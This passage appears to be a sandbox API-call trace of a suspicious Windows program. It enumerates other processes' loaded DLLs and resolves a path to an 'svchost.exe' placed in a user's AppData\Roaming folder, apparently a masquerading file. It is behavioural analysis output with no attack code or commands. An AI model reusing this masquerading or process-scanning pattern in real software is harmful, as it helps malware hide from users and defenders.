[0074.638] GetModuleBaseNameW (in: hProcess=0x214, hModule=0x7fefd640000, lpBaseName=0xd910e0, nSize=0x800 | out: lpBaseName="SspiCli.dll") returned 0xb [0074.638] CoTaskMemFree (pv=0xd910e0) [0074.638] CoTaskMemAlloc (cb=0x804) returned 0xd910e0 [0074.639] GetModuleFileNameExW (in: hProcess=0x214, hModule=0x7fefd640000, lpFilename=0xd910e0, nSize=0x800 | out: lpFilename="C:\\Windows\\system32\\SspiCli.dll" (normalized: "c:\\windows\\system32\\sspicli.dll")) returned 0x1f [0074.639] CoTaskMemFree (pv=0xd910e0) [0074.639] GetModuleInformation (in: hProcess=0x214, hModule=0x7fefd780000, lpmodinfo=0x2468c88, cb=0x18 | out: lpmodinfo=0x2468c88*(lpBaseOfDll=0x7fefd780000, SizeOfImage=0xf000, EntryPoint=0x7fefd7819b0)) returned 1 [0074.640] CoTaskMemAlloc (cb=0x804) returned 0xd910e0 [0074.640] GetModuleBaseNameW (in: hProcess=0x214, hModule=0x7fefd780000, lpBaseName=0xd910e0, nSize=0x800 | out: lpBaseName="profapi.dll") returned 0xb [0074.641] CoTaskMemFree (pv=0xd910e0) [0074.641] CoTaskMemAlloc (cb=0x804) returned 0xd910e0 [0074.641] GetModuleFileNameExW (in: hProcess=0x214, hModule=0x7fefd780000, lpFilename=0xd910e0, nSize=0x800 | out: lpFilename="C:\\Windows\\system32\\profapi.dll" (normalized: "c:\\windows\\system32\\profapi.dll")) returned 0x1f [0074.642] CoTaskMemFree (pv=0xd910e0) [0074.642] GetModuleInformation (in: hProcess=0x214, hModule=0x7fefee80000, lpmodinfo=0x246ae48, cb=0x18 | out: lpmodinfo=0x246ae48*(lpBaseOfDll=0x7fefee80000, SizeOfImage=0x1f000, EntryPoint=0x7fefee860e8)) returned 1 [0074.642] CoTaskMemAlloc (cb=0x804) returned 0xd910e0 [0074.642] GetModuleBaseNameW (in: hProcess=0x214, hModule=0x7fefee80000, lpBaseName=0xd910e0, nSize=0x800 | out: lpBaseName="sechost.dll") returned 0xb [0074.643] CoTaskMemFree (pv=0xd910e0) [0074.643] CoTaskMemAlloc (cb=0x804) returned 0xd910e0 [0074.643] GetModuleFileNameExW (in: hProcess=0x214, hModule=0x7fefee80000, lpFilename=0xd910e0, nSize=0x800 | out: lpFilename="C:\\Windows\\SYSTEM32\\sechost.dll" (normalized: "c:\\windows\\system32\\sechost.dll")) returned 0x1f [0074.644] CoTaskMemFree (pv=0xd910e0) [0074.644] GetModuleInformation (in: hProcess=0x214, hModule=0x7fefd670000, lpmodinfo=0x246d0b8, cb=0x18 | out: lpmodinfo=0x246d0b8*(lpBaseOfDll=0x7fefd670000, SizeOfImage=0xf000, EntryPoint=0x7fefd671010)) returned 1 [0074.645] CoTaskMemAlloc (cb=0x804) returned 0xd910e0 [0074.645] GetModuleBaseNameW (in: hProcess=0x214, hModule=0x7fefd670000, lpBaseName=0xd910e0, nSize=0x800 | out: lpBaseName="CRYPTBASE.dll") returned 0xd [0074.646] CoTaskMemFree (pv=0xd910e0) [0074.646] CoTaskMemAlloc (cb=0x804) returned 0xd910e0 [0074.646] GetModuleFileNameExW (in: hProcess=0x214, hModule=0x7fefd670000, lpFilename=0xd910e0, nSize=0x800 | out: lpFilename="C:\\Windows\\system32\\CRYPTBASE.dll" (normalized: "c:\\windows\\system32\\cryptbase.dll")) returned 0x21 [0074.647] CoTaskMemFree (pv=0xd910e0) [0074.647] GetModuleInformation (in: hProcess=0x214, hModule=0x7fefd620000, lpmodinfo=0x246f288, cb=0x18 | out: lpmodinfo=0x246f288*(lpBaseOfDll=0x7fefd620000, SizeOfImage=0x19000, EntryPoint=0x7fefd621020)) returned 1 [0074.648] CoTaskMemAlloc (cb=0x804) returned 0xd910e0 [0074.648] GetModuleBaseNameW (in: hProcess=0x214, hModule=0x7fefd620000, lpBaseName=0xd910e0, nSize=0x800 | out: lpBaseName="scext.dll") returned 0x9 [0074.649] CoTaskMemFree (pv=0xd910e0) [0074.649] CoTaskMemAlloc (cb=0x804) returned 0xd910e0 [0074.649] GetModuleFileNameExW (in: hProcess=0x214, hModule=0x7fefd620000, lpFilename=0xd910e0, nSize=0x800 | out: lpFilename="C:\\Windows\\system32\\scext.dll" (normalized: "c:\\windows\\system32\\scext.dll")) returned 0x1d [0074.650] CoTaskMemFree (pv=0xd910e0) [0074.650] GetModuleInformation (in: hProcess=0x214, hModule=0x77610000, lpmodinfo=0x2471448, cb=0x18 | out: lpmodinfo=0x2471448*(lpBaseOfDll=0x77610000, SizeOfImage=0xfa000, EntryPoint=0x7762a2c8)) returned 1 [0074.650] CoTaskMemAlloc (cb=0x804) returned 0xd910e0 [0074.650] GetModuleBaseNameW (in: hProcess=0x214, hModule=0x77610000, lpBaseName=0xd910e0, nSize=0x800 | out: lpBaseName="USER32.dll") returned 0xa [0074.651] CoTaskMemFree (pv=0xd910e0) [0074.651] CoTaskMemAlloc (cb=0x804) returned 0xd910e0 [0074.651] GetModuleFileNameExW (in: hProcess=0x214, hModule=0x77610000, lpFilename=0xd910e0, nSize=0x800 | out: lpFilename="C:\\Windows\\system32\\USER32.dll" (normalized: "c:\\windows\\system32\\user32.dll")) returned 0x1e [0074.652] CoTaskMemFree (pv=0xd910e0) [0074.652] GetModuleInformation (in: hProcess=0x214, hModule=0x7feff1c0000, lpmodinfo=0x2473608, cb=0x18 | out: lpmodinfo=0x2473608*(lpBaseOfDll=0x7feff1c0000, SizeOfImage=0x67000, EntryPoint=0x7feff1cb03c)) returned 1 [0074.653] CoTaskMemAlloc (cb=0x804) returned 0xd910e0 [0074.653] GetModuleBaseNameW (in: hProcess=0x214, hModule=0x7feff1c0000, lpBaseName=0xd910e0, nSize=0x800 | out: lpBaseName="GDI32.dll") returned 0x9 [0074.654] CoTaskMemFree (pv=0xd910e0) [0074.654] CoTaskMemAlloc (cb=0x804) returned 0xd910e0 [0074.654] GetModuleFileNameExW (in: hProcess=0x214, hModule=0x7feff1c0000, lpFilename=0xd910e0, nSize=0x800 | out: lpFilename="C:\\Windows\\system32\\GDI32.dll" (normalized: "c:\\windows\\system32\\gdi32.dll")) returned 0x1d [0074.655] CoTaskMemFree (pv=0xd910e0) [0074.655] GetModuleInformation (in: hProcess=0x214, hModule=0x7feff350000, lpmodinfo=0x24757c8, cb=0x18 | out: lpmodinfo=0x24757c8*(lpBaseOfDll=0x7feff350000, SizeOfImage=0xe000, EntryPoint=0x7feff351080)) returned 1 [0074.656] CoTaskMemAlloc (cb=0x804) returned 0xd910e0 [0074.656] GetModuleBaseNameW (in: hProcess=0x214, hModule=0x7feff350000, lpBaseName=0xd910e0, nSize=0x800 | out: lpBaseName="LPK.dll") returned 0x7 [0074.657] CoTaskMemFree (pv=0xd910e0) [0074.658] CoTaskMemAlloc (cb=0x804) returned 0xd910e0 [0074.658] GetModuleFileNameExW (in: hProcess=0x214, hModule=0x7feff350000, lpFilename=0xd910e0, nSize=0x800 | out: lpFilename="C:\\Windows\\system32\\LPK.dll" (normalized: "c:\\windows\\system32\\lpk.dll")) returned 0x1b [0074.659] CoTaskMemFree (pv=0xd910e0) [0074.659] GetModuleInformation (in: hProcess=0x214, hModule=0x7feff690000, lpmodinfo=0x2477978, cb=0x18 | out: lpmodinfo=0x2477978*(lpBaseOfDll=0x7feff690000, SizeOfImage=0xc9000, EntryPoint=0x7feff70a874)) returned 1 [0074.660] CoTaskMemAlloc (cb=0x804) returned 0xd910e0 [0074.660] GetModuleBaseNameW (in: hProcess=0x214, hModule=0x7feff690000, lpBaseName=0xd910e0, nSize=0x800 | out: lpBaseName="USP10.dll") returned 0x9 [0074.661] CoTaskMemFree (pv=0xd910e0) [0074.661] CoTaskMemAlloc (cb=0x804) returned 0xd910e0 [0074.661] GetModuleFileNameExW (in: hProcess=0x214, hModule=0x7feff690000, lpFilename=0xd910e0, nSize=0x800 | out: lpFilename="C:\\Windows\\system32\\USP10.dll" (normalized: "c:\\windows\\system32\\usp10.dll")) returned 0x1d [0074.662] CoTaskMemFree (pv=0xd910e0) [0074.662] GetModuleInformation (in: hProcess=0x214, hModule=0x7fefd610000, lpmodinfo=0x2479b38, cb=0x18 | out: lpmodinfo=0x2479b38*(lpBaseOfDll=0x7fefd610000, SizeOfImage=0xb000, EntryPoint=0x7fefd611030)) returned 1 [0074.663] CoTaskMemAlloc (cb=0x804) returned 0xd910e0 [0074.663] GetModuleBaseNameW (in: hProcess=0x214, hModule=0x7fefd610000, lpBaseName=0xd910e0, nSize=0x800 | out: lpBaseName="Secur32.dll") returned 0xb [0074.665] CoTaskMemFree (pv=0xd910e0) [0074.665] CoTaskMemAlloc (cb=0x804) returned 0xd910e0 [0074.665] GetModuleFileNameExW (in: hProcess=0x214, hModule=0x7fefd610000, lpFilename=0xd910e0, nSize=0x800 | out: lpFilename="C:\\Windows\\system32\\Secur32.dll" (normalized: "c:\\windows\\system32\\secur32.dll")) returned 0x1f [0074.666] CoTaskMemFree (pv=0xd910e0) [0074.666] GetModuleInformation (in: hProcess=0x214, hModule=0x7fefd5a0000, lpmodinfo=0x247bcf8, cb=0x18 | out: lpmodinfo=0x247bcf8*(lpBaseOfDll=0x7fefd5a0000, SizeOfImage=0x67000, EntryPoint=0x7fefd5a1010)) returned 1 [0074.667] CoTaskMemAlloc (cb=0x804) returned 0xd910e0 [0074.668] GetModuleBaseNameW (in: hProcess=0x214, hModule=0x7fefd5a0000, lpBaseName=0xd910e0, nSize=0x800 | out: lpBaseName="SCESRV.dll") returned 0xa [0074.669] CoTaskMemFree (pv=0xd910e0) [0074.669] CoTaskMemAlloc (cb=0x804) returned 0xd910e0 [0074.669] GetModuleFileNameExW (in: hProcess=0x214, hModule=0x7fefd5a0000, lpFilename=0xd910e0, nSize=0x800 | out: lpFilename="C:\\Windows\\system32\\SCESRV.dll" (normalized: "c:\\windows\\system32\\scesrv.dll")) returned 0x1e [0074.670] CoTaskMemFree (pv=0xd910e0) [0074.670] GetModuleInformation (in: hProcess=0x214, hModule=0x7fefd570000, lpmodinfo=0x247dfd0, cb=0x18 | out: lpmodinfo=0x247dfd0*(lpBaseOfDll=0x7fefd570000, SizeOfImage=0x23000, EntryPoint=0x7fefd571198)) returned 1 [0074.671] CoTaskMemAlloc (cb=0x804) returned 0xd910e0 [0074.671] GetModuleBaseNameW (in: hProcess=0x214, hModule=0x7fefd570000, lpBaseName=0xd910e0, nSize=0x800 | out: lpBaseName="srvcli.dll") returned 0xa [0074.673] CoTaskMemFree (pv=0xd910e0) [0074.673] CoTaskMemAlloc (cb=0x804) returned 0xd910e0 [0074.673] GetModuleFileNameExW (in: hProcess=0x214, hModule=0x7fefd570000, lpFilename=0xd910e0, nSize=0x800 | out: lpFilename="C:\\Windows\\system32\\srvcli.dll" (normalized: "c:\\windows\\system32\\srvcli.dll")) returned 0x1e [0074.674] CoTaskMemFree (pv=0xd910e0) [0074.674] GetModuleInformation (in: hProcess=0x214, hModule=0x7feff400000, lpmodinfo=0x2480190, cb=0x18 | out: lpmodinfo=0x2480190*(lpBaseOfDll=0x7feff400000, SizeOfImage=0x2e000, EntryPoint=0x7feff401010)) returned 1 [0074.675] CoTaskMemAlloc (cb=0x804) returned 0xd910e0 [0074.675] GetModuleBaseNameW (in: hProcess=0x214, hModule=0x7feff400000, lpBaseName=0xd910e0, nSize=0x800 | out: lpBaseName="IMM32.DLL") returned 0x9 [0074.676] CoTaskMemFree (pv=0xd910e0) [0074.676] CoTaskMemAlloc (cb=0x804) returned 0xd910e0 [0074.677] GetModuleFileNameExW (in: hProcess=0x214, hModule=0x7feff400000, lpFilename=0xd910e0, nSize=0x800 | out: lpFilename="C:\\Windows\\system32\\IMM32.DLL" (normalized: "c:\\windows\\system32\\imm32.dll")) returned 0x1d [0074.678] CoTaskMemFree (pv=0xd910e0) [0074.678] GetModuleInformation (in: hProcess=0x214, hModule=0x7feff9d0000, lpmodinfo=0x2482350, cb=0x18 | out: lpmodinfo=0x2482350*(lpBaseOfDll=0x7feff9d0000, SizeOfImage=0x109000, EntryPoint=0x7feff9d1064)) returned 1 [0074.679] CoTaskMemAlloc (cb=0x804) returned 0xd910e0 [0074.679] GetModuleBaseNameW (in: hProcess=0x214, hModule=0x7feff9d0000, lpBaseName=0xd910e0, nSize=0x800 | out: lpBaseName="MSCTF.dll") returned 0x9 [0074.680] CoTaskMemFree (pv=0xd910e0) [0074.680] CoTaskMemAlloc (cb=0x804) returned 0xd910e0 [0074.681] GetModuleFileNameExW (in: hProcess=0x214, hModule=0x7feff9d0000, lpFilename=0xd910e0, nSize=0x800 | out: lpFilename="C:\\Windows\\system32\\MSCTF.dll" (normalized: "c:\\windows\\system32\\msctf.dll")) returned 0x1d [0074.682] CoTaskMemFree (pv=0xd910e0) [0074.682] GetModuleInformation (in: hProcess=0x214, hModule=0x7fefd760000, lpmodinfo=0x2484510, cb=0x18 | out: lpmodinfo=0x2484510*(lpBaseOfDll=0x7fefd760000, SizeOfImage=0x14000, EntryPoint=0x7fefd7610e0)) returned 1 [0074.684] CoTaskMemAlloc (cb=0x804) returned 0xd910e0 [0074.684] GetModuleBaseNameW (in: hProcess=0x214, hModule=0x7fefd760000, lpBaseName=0xd910e0, nSize=0x800 | out: lpBaseName="RpcRtRemote.dll") returned 0xf [0074.685] CoTaskMemFree (pv=0xd910e0) [0074.685] CoTaskMemAlloc (cb=0x804) returned 0xd910e0 [0074.685] GetModuleFileNameExW (in: hProcess=0x214, hModule=0x7fefd760000, lpFilename=0xd910e0, nSize=0x800 | out: lpFilename="C:\\Windows\\system32\\RpcRtRemote.dll" (normalized: "c:\\windows\\system32\\rpcrtremote.dll")) returned 0x23 [0074.687] CoTaskMemFree (pv=0xd910e0) [0074.687] GetModuleInformation (in: hProcess=0x214, hModule=0x7fefcc70000, lpmodinfo=0x24866e0, cb=0x18 | out: lpmodinfo=0x24866e0*(lpBaseOfDll=0x7fefcc70000, SizeOfImage=0xa000, EntryPoint=0x7fefcc73cb8)) returned 1 [0074.688] CoTaskMemAlloc (cb=0x804) returned 0xd910e0 [0074.688] GetModuleBaseNameW (in: hProcess=0x214, hModule=0x7fefcc70000, lpBaseName=0xd910e0, nSize=0x800 | out: lpBaseName="credssp.dll") returned 0xb [0074.689] CoTaskMemFree (pv=0xd910e0) [0074.689] CoTaskMemAlloc (cb=0x804) returned 0xd910e0 [0074.689] GetModuleFileNameExW (in: hProcess=0x214, hModule=0x7fefcc70000, lpFilename=0xd910e0, nSize=0x800 | out: lpFilename="C:\\Windows\\system32\\credssp.dll" (normalized: "c:\\windows\\system32\\credssp.dll")) returned 0x1f [0074.691] CoTaskMemFree (pv=0xd910e0) [0074.691] GetModuleInformation (in: hProcess=0x214, hModule=0x7fefd260000, lpmodinfo=0x24888a0, cb=0x18 | out: lpmodinfo=0x24888a0*(lpBaseOfDll=0x7fefd260000, SizeOfImage=0x2f000, EntryPoint=0x7fefd261064)) returned 1 [0074.692] CoTaskMemAlloc (cb=0x804) returned 0xd910e0 [0074.692] GetModuleBaseNameW (in: hProcess=0x214, hModule=0x7fefd260000, lpBaseName=0xd910e0, nSize=0x800 | out: lpBaseName="AUTHZ.dll") returned 0x9 [0074.694] CoTaskMemFree (pv=0xd910e0) [0074.694] CoTaskMemAlloc (cb=0x804) returned 0xd910e0 [0074.694] GetModuleFileNameExW (in: hProcess=0x214, hModule=0x7fefd260000, lpFilename=0xd910e0, nSize=0x800 | out: lpFilename="C:\\Windows\\system32\\AUTHZ.dll" (normalized: "c:\\windows\\system32\\authz.dll")) returned 0x1d [0074.696] CoTaskMemFree (pv=0xd910e0) [0074.696] GetModuleInformation (in: hProcess=0x214, hModule=0x7fefcc30000, lpmodinfo=0x248aa60, cb=0x18 | out: lpmodinfo=0x248aa60*(lpBaseOfDll=0x7fefcc30000, SizeOfImage=0x39000, EntryPoint=0x7fefcc3c0f0)) returned 1 [0074.697] CoTaskMemAlloc (cb=0x804) returned 0xd910e0 [0074.697] GetModuleBaseNameW (in: hProcess=0x214, hModule=0x7fefcc30000, lpBaseName=0xd910e0, nSize=0x800 | out: lpBaseName="UBPM.dll") returned 0x8 [0074.699] CoTaskMemFree (pv=0xd910e0) [0074.699] CoTaskMemAlloc (cb=0x804) returned 0xd910e0 [0074.699] GetModuleFileNameExW (in: hProcess=0x214, hModule=0x7fefcc30000, lpFilename=0xd910e0, nSize=0x800 | out: lpFilename="C:\\Windows\\system32\\UBPM.dll" (normalized: "c:\\windows\\system32\\ubpm.dll")) returned 0x1c [0074.701] CoTaskMemFree (pv=0xd910e0) [0074.701] GetModuleInformation (in: hProcess=0x214, hModule=0x7feff430000, lpmodinfo=0x248cc20, cb=0x18 | out: lpmodinfo=0x248cc20*(lpBaseOfDll=0x7feff430000, SizeOfImage=0xdb000, EntryPoint=0x7feff450760)) returned 1 [0074.702] CoTaskMemAlloc (cb=0x804) returned 0xd910e0 [0074.702] GetModuleBaseNameW (in: hProcess=0x214, hModule=0x7feff430000, lpBaseName=0xd910e0, nSize=0x800 | out: lpBaseName="ADVAPI32.dll") returned 0xc [0074.704] CoTaskMemFree (pv=0xd910e0) [0074.704] CoTaskMemAlloc (cb=0x804) returned 0xd910e0 [0074.704] GetModuleFileNameExW (in: hProcess=0x214, hModule=0x7feff430000, lpFilename=0xd910e0, nSize=0x800 | out: lpFilename="C:\\Windows\\system32\\ADVAPI32.dll" (normalized: "c:\\windows\\system32\\advapi32.dll")) returned 0x20 [0074.705] CoTaskMemFree (pv=0xd910e0) [0074.705] GetModuleInformation (in: hProcess=0x214, hModule=0x7fefbb00000, lpmodinfo=0x248edf0, cb=0x18 | out: lpmodinfo=0x248edf0*(lpBaseOfDll=0x7fefbb00000, SizeOfImage=0x11000, EntryPoint=0x7fefbb01070)) returned 1 [0074.707] CoTaskMemAlloc (cb=0x804) returned 0xd910e0 [0074.707] GetModuleBaseNameW (in: hProcess=0x214, hModule=0x7fefbb00000, lpBaseName=0xd910e0, nSize=0x800 | out: lpBaseName="WTSAPI32.dll") returned 0xc [0074.709] CoTaskMemFree (pv=0xd910e0) [0074.709] CoTaskMemAlloc (cb=0x804) returned 0xd910e0 [0074.709] GetModuleFileNameExW (in: hProcess=0x214, hModule=0x7fefbb00000, lpFilename=0xd910e0, nSize=0x800 | out: lpFilename="C:\\Windows\\system32\\WTSAPI32.dll" (normalized: "c:\\windows\\system32\\wtsapi32.dll")) returned 0x20 [0074.711] CoTaskMemFree (pv=0xd910e0) [0074.711] GetModuleInformation (in: hProcess=0x214, hModule=0x7fefd720000, lpmodinfo=0x2490fc0, cb=0x18 | out: lpmodinfo=0x2490fc0*(lpBaseOfDll=0x7fefd720000, SizeOfImage=0x3d000, EntryPoint=0x7fefd7218f4)) returned 1 [0074.712] CoTaskMemAlloc (cb=0x804) returned 0xd910e0 [0074.712] GetModuleBaseNameW (in: hProcess=0x214, hModule=0x7fefd720000, lpBaseName=0xd910e0, nSize=0x800 | out: lpBaseName="WINSTA.dll") returned 0xa [0074.714] CoTaskMemFree (pv=0xd910e0) [0074.714] CoTaskMemAlloc (cb=0x804) returned 0xd910e0 [0074.714] GetModuleFileNameExW (in: hProcess=0x214, hModule=0x7fefd720000, lpFilename=0xd910e0, nSize=0x800 | out: lpFilename="C:\\Windows\\system32\\WINSTA.dll" (normalized: "c:\\windows\\system32\\winsta.dll")) returned 0x1e [0074.716] CoTaskMemFree (pv=0xd910e0) [0074.716] GetModuleInformation (in: hProcess=0x214, hModule=0x7feff970000, lpmodinfo=0x2493198, cb=0x18 | out: lpmodinfo=0x2493198*(lpBaseOfDll=0x7feff970000, SizeOfImage=0x4d000, EntryPoint=0x7feff971070)) returned 1 [0074.717] CoTaskMemAlloc (cb=0x804) returned 0xd910e0 [0074.717] GetModuleBaseNameW (in: hProcess=0x214, hModule=0x7feff970000, lpBaseName=0xd910e0, nSize=0x800 | out: lpBaseName="WS2_32.dll") returned 0xa [0074.719] CoTaskMemFree (pv=0xd910e0) [0074.719] CoTaskMemAlloc (cb=0x804) returned 0xd910e0 [0074.719] GetModuleFileNameExW (in: hProcess=0x214, hModule=0x7feff970000, lpFilename=0xd910e0, nSize=0x800 | out: lpFilename="C:\\Windows\\system32\\WS2_32.dll" (normalized: "c:\\windows\\system32\\ws2_32.dll")) returned 0x1e [0074.721] CoTaskMemFree (pv=0xd910e0) [0074.721] GetModuleInformation (in: hProcess=0x214, hModule=0x7feff9c0000, lpmodinfo=0x2495358, cb=0x18 | out: lpmodinfo=0x2495358*(lpBaseOfDll=0x7feff9c0000, SizeOfImage=0x8000, EntryPoint=0x7feff9c1504)) returned 1 [0074.723] CoTaskMemAlloc (cb=0x804) returned 0xd910e0 [0074.723] GetModuleBaseNameW (in: hProcess=0x214, hModule=0x7feff9c0000, lpBaseName=0xd910e0, nSize=0x800 | out: lpBaseName="NSI.dll") returned 0x7 [0074.725] CoTaskMemFree (pv=0xd910e0) [0074.725] CoTaskMemAlloc (cb=0x804) returned 0xd910e0 [0074.725] GetModuleFileNameExW (in: hProcess=0x214, hModule=0x7feff9c0000, lpFilename=0xd910e0, nSize=0x800 | out: lpFilename="C:\\Windows\\system32\\NSI.dll" (normalized: "c:\\windows\\system32\\nsi.dll")) returned 0x1b [0074.727] CoTaskMemFree (pv=0xd910e0) [0074.727] GetModuleInformation (in: hProcess=0x214, hModule=0x7fefd010000, lpmodinfo=0x2497508, cb=0x18 | out: lpmodinfo=0x2497508*(lpBaseOfDll=0x7fefd010000, SizeOfImage=0x55000, EntryPoint=0x7fefd011054)) returned 1 [0074.728] CoTaskMemAlloc (cb=0x804) returned 0xd910e0 [0074.729] GetModuleBaseNameW (in: hProcess=0x214, hModule=0x7fefd010000, lpBaseName=0xd910e0, nSize=0x800 | out: lpBaseName="mswsock.dll") returned 0xb [0074.730] CoTaskMemFree (pv=0xd910e0) [0074.730] CoTaskMemAlloc (cb=0x804) returned 0xd910e0 [0074.730] GetModuleFileNameExW (in: hProcess=0x214, hModule=0x7fefd010000, lpFilename=0xd910e0, nSize=0x800 | out: lpFilename="C:\\Windows\\system32\\mswsock.dll" (normalized: "c:\\windows\\system32\\mswsock.dll")) returned 0x1f [0074.732] CoTaskMemFree (pv=0xd910e0) [0074.732] GetModuleInformation (in: hProcess=0x214, hModule=0x7fefca10000, lpmodinfo=0x24996c8, cb=0x18 | out: lpmodinfo=0x24996c8*(lpBaseOfDll=0x7fefca10000, SizeOfImage=0x7000, EntryPoint=0x7fefca114b0)) returned 1 [0074.734] CoTaskMemAlloc (cb=0x804) returned 0xd910e0 [0074.734] GetModuleBaseNameW (in: hProcess=0x214, hModule=0x7fefca10000, lpBaseName=0xd910e0, nSize=0x800 | out: lpBaseName="wshtcpip.dll") returned 0xc [0074.736] CoTaskMemFree (pv=0xd910e0) [0074.736] CoTaskMemAlloc (cb=0x804) returned 0xd910e0 [0074.736] GetModuleFileNameExW (in: hProcess=0x214, hModule=0x7fefca10000, lpFilename=0xd910e0, nSize=0x800 | out: lpFilename="C:\\Windows\\System32\\wshtcpip.dll" (normalized: "c:\\windows\\system32\\wshtcpip.dll")) returned 0x20 [0074.738] CoTaskMemFree (pv=0xd910e0) [0074.738] GetModuleInformation (in: hProcess=0x214, hModule=0x7fefd000000, lpmodinfo=0x249b898, cb=0x18 | out: lpmodinfo=0x249b898*(lpBaseOfDll=0x7fefd000000, SizeOfImage=0x7000, EntryPoint=0x7fefd00142c)) returned 1 [0074.740] CoTaskMemAlloc (cb=0x804) returned 0xd910e0 [0074.740] GetModuleBaseNameW (in: hProcess=0x214, hModule=0x7fefd000000, lpBaseName=0xd910e0, nSize=0x800 | out: lpBaseName="wship6.dll") returned 0xa [0074.742] CoTaskMemFree (pv=0xd910e0) [0074.742] CoTaskMemAlloc (cb=0x804) returned 0xd910e0 [0074.742] GetModuleFileNameExW (in: hProcess=0x214, hModule=0x7fefd000000, lpFilename=0xd910e0, nSize=0x800 | out: lpFilename="C:\\Windows\\System32\\wship6.dll" (normalized: "c:\\windows\\system32\\wship6.dll")) returned 0x1e [0074.744] CoTaskMemFree (pv=0xd910e0) [0074.744] CloseHandle (hObject=0x214) returned 1 [0074.749] GetFullPathNameW (in: lpFileName="C:\\Users\\kEecfMwgj\\AppData\\Roaming\\svchost.exe", nBufferLength=0x105, lpBuffer=0x23e7e0, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\kEecfMwgj\\AppData\\Roaming\\svchost.exe", lpFilePart=0x0) returned 0x2e [0074.749] OpenProcess (dwDesiredAccess=0x410, bInheritHandle=0, dwProcessId=0xa44) returned 0x214 [0074.749] EnumProcessModules (in: hProcess=0x214, lphModule=0x249e898, cb=0x200, lpcbNeeded=0x23ee40 | out: lphModule=0x249e898, lpcbNeeded=0x23ee40) returned 1 [0074.750] GetModuleInformation (in: hProcess=0x214, hModule=0xda0000, lpmodinfo=0x249eb08, cb=0x18 | out: lpmodinfo=0x249eb08*(lpBaseOfDll=0xda0000, SizeOfImage=0x17000, EntryPoint=0xda14a1)) returned 1 [0074.750] CoTaskMemAlloc (cb=0x804) returned 0xd910e0 [0074.750] GetModuleBaseNameW (in: hProcess=0x214, hModule=0xda0000, lpBaseName=0xd910e0, nSize=0x800 | out: lpBaseName="edcsvr.exe") returned 0xa [0074.751] CoTaskMemFree (pv=0xd910e0) [0074.751] CoTaskMemAlloc (cb=0x804) returned 0xd910e0 [0074.751] GetModuleFileNameExW (in: hProcess=0x214, hModule=0xda0000, lpFilename=0xd910e0, nSize=0x800 | out: lpFilename="C:\\Program Files\\Reference Assemblies\\edcsvr.exe" (normalized: "c:\\program files\\reference assemblies\\edcsvr.exe")) returned 0x30 [0074.751] CoTaskMemFree (pv=0xd910e0) [0074.751] GetModuleInformation (in: hProcess=0x214, hModule=0x77830000, lpmodinfo=0x24a0d28, cb=0x18 | out: lpmodinfo=0x24a0d28*(lpBaseOfDll=0x77830000, SizeOfImage=0x1a9000, EntryPoint=0x0)) returned 1 [0074.751] CoTaskMemAlloc (cb=0x804) returned 0xd910e0 [0074.751] GetModuleBaseNameW (in: hProcess=0x214, hModule=0x77830000, lpBaseName=0xd910e0, nSize=0x800 | out: lpBaseName="ntdll.dll") returned 0x9 [0074.752] CoTaskMemFree (pv=0xd910e0) [0074.752] CoTaskMemAlloc (cb=0x804) returned 0xd910e0 [0074.752] GetModuleFileNameExW (in: hProcess=0x214, hModule=0x77830000, lpFilename=0xd910e0, nSize=0x800 | out: lpFilename="C:\\Windows\\SYSTEM32\\ntdll.dll" (normalized: "c:\\windows\\system32\\ntdll.dll")) returned 0x1d [0074.752] CoTaskMemFree (pv=0xd910e0) [0074.753] GetModuleInformation (in: hProcess=0x214, hModule=0x75300000, lpmodinfo=0x24a2ee8, cb=0x18 | out: lpmodinfo=0x24a2ee8*(lpBaseOfDll=0x75300000, SizeOfImage=0x3f000, EntryPoint=0x7532e088)) returned 1 [0074.753] CoTaskMemAlloc (cb=0x804) returned 0xd910e0 [0074.753] GetModuleBaseNameW (in: hProcess=0x214, hModule=0x75300000, lpBaseName=0xd910e0, nSize=0x800 | out: lpBaseName="wow64.dll") returned 0x9 [0074.754] CoTaskMemFree (pv=0xd910e0) [0074.754] CoTaskMemAlloc (cb=0x804) returned 0xd910e0 [0074.754] GetModuleFileNameExW (in: hProcess=0x214, hModule=0x75300000, lpFilename=0xd910e0, nSize=0x800 | out: lpFilename="C:\\Windows\\SYSTEM32\\wow64.dll" (normalized: "c:\\windows\\system32\\wow64.dll")) returned 0x1d [0074.754] CoTaskMemFree (pv=0xd910e0) [0074.754] GetModuleInformation (in: hProcess=0x214, hModule=0x752a0000, lpmodinfo=0x24a50c0, cb=0x18 | out: lpmodinfo=0x24a50c0*(lpBaseOfDll=0x752a0000, SizeOfImage=0x5c000, EntryPoint=0x752df9f4)) returned 1 [0074.755] CoTaskMemAlloc (cb=0x804) returned 0xd910e0 [0074.755] GetModuleBaseNameW (in: hProcess=0x214, hModule=0x752a0000, lpBaseName=0xd910e0, nSize=0x800 | out: lpBaseName="wow64win.dll") returned 0xc [0074.755] CoTaskMemFree (pv=0xd910e0) [0074.755] CoTaskMemAlloc (cb=0x804) returned 0xd910e0 [0074.755] GetModuleFileNameExW (in: hProcess=0x214, hModule=0x752a0000, lpFilename=0xd910e0, nSize=0x800 | out: lpFilename="C:\\Windows\\SYSTEM32\\wow64win.dll" (normalized: "c:\\windows\\system32\\wow64win.dll")) returned 0x20 [0074.756] CoTaskMemFree (pv=0xd910e0) [0074.756] GetModuleInformation (in: hProcess=0x214, hModule=0x75290000, lpmodinfo=0x24a7290, cb=0x18 | out: lpmodinfo=0x24a7290*(lpBaseOfDll=0x75290000, SizeOfImage=0x8000, EntryPoint=0x752920f8)) returned 1 [0074.756] CoTaskMemAlloc (cb=0x804) returned 0xd910e0 [0074.756] GetModuleBaseNameW (in: hProcess=0x214, hModule=0x75290000, lpBaseName=0xd910e0, nSize=0x800 | out: lpBaseName="wow64cpu.dll") returned 0xc [0074.757] CoTaskMemFree (pv=0xd910e0) [0074.757] CoTaskMemAlloc (cb=0x804) returned 0xd910e0 [0074.757] GetModuleFileNameExW (in: hProcess=0x214, hModule=0x75290000, lpFilename=0xd910e0, nSize=0x800 | out: lpFilename="C:\\Windows\\SYSTEM32\\wow64cpu.dll" (normalized: "c:\\windows\\system32\\wow64cpu.dll")) returned 0x20 [0074.758] CoTaskMemFree (pv=0xd910e0) [0074.758] CloseHandle (hObject=0x214) returned 1 [0074.759] GetFullPathNameW (in: lpFileName="C:\\Users\\kEecfMwgj\\AppData\\Roaming\\svchost.exe", nBufferLength=0x105, lpBuffer=0x23e7e0, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\kEecfMwgj\\AppData\\Roaming\\svchost.exe", lpFilePart=0x0) returned 0x2e [0074.759] OpenProcess 